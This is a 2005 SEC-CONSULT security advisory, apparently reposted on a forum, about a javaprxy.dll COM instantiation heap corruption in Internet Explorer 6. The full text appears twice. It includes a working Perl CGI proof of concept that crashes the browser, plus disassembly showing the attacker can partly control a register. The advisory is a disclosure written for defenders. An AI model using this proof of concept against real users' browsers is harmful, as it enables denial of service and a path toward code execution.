Bernhard Mueller
29/06/05, 20:05
SEC-CONSULT Security Advisory < 20050629-0 >
================================================== ================================
title: IE6 javaprxy.dll COM instantiation heap corruption
vulnerability
program: Internet Explorer
vulnerable version: 6.0.2900.2180
homepage: www.microsoft.com
found: 2005-06-17
by: sk0L & Martin Eiszner / SEC-CONSULT /
www.sec-consult.com
================================================== ================================
background:
---------------
Internet Explorer supports instantiation of non-ActiveX controls, e.g
COM objects, via <object> tags. according to M$, COM components respond
gracefully to attempts to treat them as non-ActiveX controls. on the
contrary, we found that at least 20 of the objects available on an
average XP system either lead to an instant crash or an exception after
a few reloads.
vulnerability overview:
---------------
Loading HTML documents with certain embedded CLSIDs results in
null-pointer exceptions or memory corruption. in one case, we could
leverage this bug to overwrite a function pointer in the data segment.
it *may* be possible to exploit this issue to execute arbitrary code in
the context of IE.
proof of concept:
---------------
this simple CGI should crash IE.
---------------
#!/usr/bin/perl
# in order for this to work javaprxy.dll must be available on the client.
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll
my $html1 = "<html><body>\n<object
classid=\"CLSID:".$clsid."\"></object>\n";
my $html2 = "\n</body><script>location.reload();</script></html>\n";
print "Content-Type: text/html;\r\n\r\n";
print $html1.("A"x30000).$html2;
---------------
on our lab machine, we, end up with eax=00410041, and an exception
occurs at the following location in javaprxy.dll:
---------------
..text:7C508660 mov eax, [ecx]
..text:7C508662 test eax, eax
..text:7C508664 jz short locret_7C50866C
..text:7C508666 mov ecx, [eax]
..text:7C508668 push eax
..text:7C508669 call dword ptr [ecx+8]
---------------
as you can see, this situation may be exploitable, considering that we
have some level of control over eax.
vulnerable versions:
---------------
javaprxy.dll 5.00.3810
internet explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519
these are the versions tested, other versions may of course be vulnerable.
vendor status:
---------------
vendor notified: 2005-06-17
vendor response: 2005-06-17
patch available: ?
microsoft does not confirm the vulnerability, as their product team can
not reproduce condition. however, they are looking at making changes to
handle COM objects in a more robust manner in the future.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~
< Bernhard Müller / Martin Eiszner > / www.sec-consult.com /
SGT ::: walter|bruder, flo, tke, dfa :::
================================================== ================================
title: IE6 javaprxy.dll COM instantiation heap corruption
vulnerability
program: Internet Explorer
vulnerable version: 6.0.2900.2180
homepage: www.microsoft.com
found: 2005-06-17
by: sk0L & Martin Eiszner / SEC-CONSULT /
www.sec-consult.com
================================================== ================================
background:
---------------
Internet Explorer supports instantiation of non-ActiveX controls, e.g
COM objects, via <object> tags. according to M$, COM components respond
gracefully to attempts to treat them as non-ActiveX controls. on the
contrary, we found that at least 20 of the objects available on an
average XP system either lead to an instant crash or an exception after
a few reloads.
vulnerability overview:
---------------
Loading HTML documents with certain embedded CLSIDs results in
null-pointer exceptions or memory corruption. in one case, we could
leverage this bug to overwrite a function pointer in the data segment.
it *may* be possible to exploit this issue to execute arbitrary code in
the context of IE.
proof of concept:
---------------
this simple CGI should crash IE.
---------------
#!/usr/bin/perl
# in order for this to work javaprxy.dll must be available on the client.
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll
my $html1 = "<html><body>\n<object
classid=\"CLSID:".$clsid."\"></object>\n";
my $html2 = "\n</body><script>location.reload();</script></html>\n";
print "Content-Type: text/html;\r\n\r\n";
print $html1.("A"x30000).$html2;
---------------
on our lab machine, we, end up with eax=00410041, and an exception
occurs at the following location in javaprxy.dll:
---------------
..text:7C508660 mov eax, [ecx]
..text:7C508662 test eax, eax
..text:7C508664 jz short locret_7C50866C
..text:7C508666 mov ecx, [eax]
..text:7C508668 push eax
..text:7C508669 call dword ptr [ecx+8]
---------------
as you can see, this situation may be exploitable, considering that we
have some level of control over eax.
vulnerable versions:
---------------
javaprxy.dll 5.00.3810
internet explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519
these are the versions tested, other versions may of course be vulnerable.
vendor status:
---------------
vendor notified: 2005-06-17
vendor response: 2005-06-17
patch available: ?
microsoft does not confirm the vulnerability, as their product team can
not reproduce condition. however, they are looking at making changes to
handle COM objects in a more robust manner in the future.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~
< Bernhard Müller / Martin Eiszner > / www.sec-consult.com /
SGT ::: walter|bruder, flo, tke, dfa :::